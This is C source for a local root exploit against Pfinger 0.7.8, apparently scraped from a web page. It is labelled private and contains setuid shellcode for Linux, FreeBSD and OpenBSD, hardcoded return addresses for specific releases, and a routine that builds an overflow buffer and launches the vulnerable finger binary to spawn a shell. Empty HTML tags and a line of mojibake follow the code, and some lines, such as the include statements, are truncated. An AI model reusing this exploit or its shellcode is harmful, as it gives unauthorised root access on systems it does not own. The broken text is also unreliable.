/* * !!PRIVATE!! DON'T DISTRIBUTE !! * L33TSecurity - confidential source * * Pfinger-0.7.8 <= Local Exploit * By Dvdman@L33TSECURITY.COM * GREETS: UPB,JDUCK * Thanks for all the C help UPB :) * * L33TSecurity - confidential source * !!PRIVATE!! DON'T DISTRIBUTE !! */ #include #include #include #define MAX_ARCH 8 //Linux Setuid Shellcode char linuxshellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; //FreeBSD Setuid Shellcode char freebsdshellcode[]= "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; //OpenBsd shellcode char openbsdshellcode[]= "\x99" /* cdq */ "\x52" /* push %edx */ "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ "\x89\xe3" /* mov %esp,%ebx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x6a\x3b" /* push $0x3b */ "\x58" /* pop %eax */ "\xcd\x80"; /* int $0x80 */ struct TARGET { char *type; char *shellcode; unsigned long ret_addr; int pad; }; struct TARGET targets [] = { {"Redhat 7.2 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124}, {"Redhat 7.3 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124}, {"Redhat 8.0 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124}, {"Debian 3.0 -x86 shellcode", linuxshellcode, 0xbfffff96,88}, {"Slackware 8.0 -x86 shellcode",linuxshellcode, 0xbfffff96,88}, {"Freebsd 4.6-RELEASE -x86 shellcode",freebsdshellcode,0xbfbffe43,88}, {"Freebsd 4.7-RC -x6 shellcode",freebsdshellcode,0xbfbffe43,88}, {"OpenBsd 3.1 -x86 shellcode",openbsdshellcode,0xdfbfdb8e,88}, {NULL, NULL, 0} }; void ussage (char *argv); int main(int argc, char **argv) { char buffer[2000]; int x,i,blah; int target; int arch; char *ptr; long *longptr; char shell[512]; if ((argc < 2)) ussage(argv[0]); target = atoi(argv[1]); // Building the Buffer bzero(&buffer, sizeof(buffer)); memset(buffer,'A',targets[target].pad); //size of info memset(buffer+strlen(buffer),'B',4); memset(buffer+strlen(buffer),'C',4); memset(buffer+strlen(buffer),'D',4); memset(buffer+strlen(buffer),'E',4); *(unsigned long *)(buffer+strlen(buffer))=targets[target].ret_addr; //return address memcpy(buffer+strlen(buffer),"\xC4\xC3\xC2\xC1\x45\x53\x80\x80",9); //sets ARGC>0x7FFFFFFF //setting shellcode to ENVSPACE memset(shell,0x90,100); memcpy(&shell[100-strlen(targets[target].shellcode)],targets[target].shellcode,strlen(targets[target].shellcode)); memcpy(shell,"SHELLCODE=",10); putenv(shell); execl("./finger", "finger", buffer, NULL); } void list_targets () { int i; for (i=0; targets[i].type != NULL; i++) { fprintf (stderr, "%d) - %s\n", i, targets[i].type); } } void ussage (char *argv) { printf ("%s - pfinger local root, user, whatever exploit\n", argv); printf ("written by dvdman\n\n"); printf ("Ussage %s \ntargets avalible:\n\n"); list_targets (); exit(0); }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß